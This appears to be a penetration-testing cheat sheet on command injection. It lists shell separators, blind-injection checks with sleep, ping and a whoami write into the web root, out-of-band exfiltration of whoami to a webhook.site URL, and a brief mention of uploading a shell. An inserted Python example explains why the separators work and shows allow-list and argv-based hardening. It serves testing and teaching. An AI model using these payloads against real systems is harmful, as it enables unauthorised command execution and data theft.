Command Injection

Exploitation

Basic command chaining

; ls -la

Using logic operators

&& ls -la

Commenting out the rest of a command

; ls -la #

Using a pipe for command chaining

| ls -la

Testing for blind injection

; sleep 10
; ping -c 10 127.0.0.1
& whoami > /var/www/html/whoami.txt &

Out-of-band testing

& nslookup webhook.site/<id>?`whoami` &
https://webhook.site/55423ec0-8c07-42cd-8346-1f91cff37e05?`whoami`
checking for new line
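
Why the separators above work, and the fix, as an added example that is not part of the original page. It assumes a Python application in which `echo lookup` stands in for the real command; all function names are hypothetical, and the inputs are constructed from this page's separators with a harmless `echo INJECTED` as the injected command.

```python
import re
import subprocess

# Constructed inputs: a benign value followed by the separators listed above,
# with a harmless `echo INJECTED` standing in for the injected command.
PAGE_STYLE_INPUTS = [
    "127.0.0.1; echo INJECTED",
    "127.0.0.1 && echo INJECTED",
    "127.0.0.1; echo INJECTED #",
    "127.0.0.1 | echo INJECTED",
    "127.0.0.1 & echo INJECTED &",
    "127.0.0.1 `echo INJECTED`",
    "127.0.0.1\necho INJECTED",
]

LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"{LABEL}(?:\.{LABEL})*")

def is_valid_host(value: str) -> bool:
    """Allow-list: dot-separated alphanumeric/hyphen labels (DNS name or IPv4)."""
    # fullmatch, not '$': a trailing newline must not slip through.
    return len(value) <= 253 and HOST_RE.fullmatch(value) is not None

def lookup_vulnerable(host: str) -> str:
    """'Before': input concatenated into a string that /bin/sh parses."""
    return subprocess.run("echo lookup " + host, shell=True,
                          capture_output=True, text=True).stdout

def lookup_argv(host: str) -> str:
    """No shell: the whole value is one argv element, separators stay literal."""
    return subprocess.run(["echo", "lookup", host],
                          capture_output=True, text=True).stdout

def lookup_hardened(host: str) -> str:
    """'After': allow-list validation first, then the shell-free call."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return lookup_argv(host)

def injected_ran(output: str) -> bool:
    """True when INJECTED came from execution, not from the literal input."""
    return "INJECTED" in output and "echo INJECTED" not in output

if __name__ == "__main__":
    for value in PAGE_STYLE_INPUTS:
        print(repr(value), injected_ran(lookup_vulnerable(value)),
              injected_ran(lookup_argv(value)), is_valid_host(value))
```

The allow-list also rejects values that begin with `-`, so an accepted value cannot be read as an option by the called program.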

Upload Shell

We can also upload a shell and trigger it. Directly inputting a command may get filtered.

Checking supported shells

which python
which php
